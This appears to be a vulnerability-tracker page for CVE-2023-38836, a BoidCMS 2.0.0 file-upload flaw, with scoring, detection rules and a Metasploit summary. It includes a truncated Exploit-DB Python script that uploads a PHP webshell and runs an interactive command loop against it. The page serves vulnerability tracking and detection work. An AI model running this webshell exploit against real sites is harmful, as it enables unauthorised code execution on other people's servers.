CVE-2023-38836
published 2023-08-21CVE-2023-38836: File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
PriorityP274high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
73.21%
99.4th percentile
File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| boidcms | boidcms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect PHP webshell upload disguised with a GIF header to bypass MIME type checks — inspect uploaded files for a GIF magic bytes prefix (GIF89a or GIF8) followed by PHP code content, especially targeting the /media/ directory. ↗
- →Alert on POST requests to /admin?page=media containing a multipart file upload where the uploaded filename ends in .php — this is the exploitation upload endpoint. ↗
- →Alert on GET requests to /media/*.php with a 'cmd' query parameter — this indicates webshell command execution following a successful upload. ↗
- →Monitor for the presence of PHP files (e.g., shell.php) appearing under the /media/ directory of a BoidCMS installation, which should normally contain only media assets. ↗
- ·Exploitation requires prior authentication to BoidCMS — the attacker must have valid credentials before abusing the file upload endpoint. ↗
- ·The vulnerability affects BoidCMS version 2.0.0 and below; the bypass relies on adding a GIF header to a PHP file to defeat server-side MIME type validation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BoidCMS v2.0.0 - authenticated file upload vulnerability
exploitdb·2023-10-09·CVSS 8.8
CVE-2023-38836 [HIGH] BoidCMS v2.0.0 - authenticated file upload vulnerability
BoidCMS v2.0.0 - authenticated file upload vulnerability
---
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: ']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)
Metasploit
BoidCMS Command Injection
metasploit·CVSS 8.8
CVE-2023-38836 [HIGH] BoidCMS Command Injection
BoidCMS Command Injection
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.
No writeups or analysis indexed.
2023-08-21
Published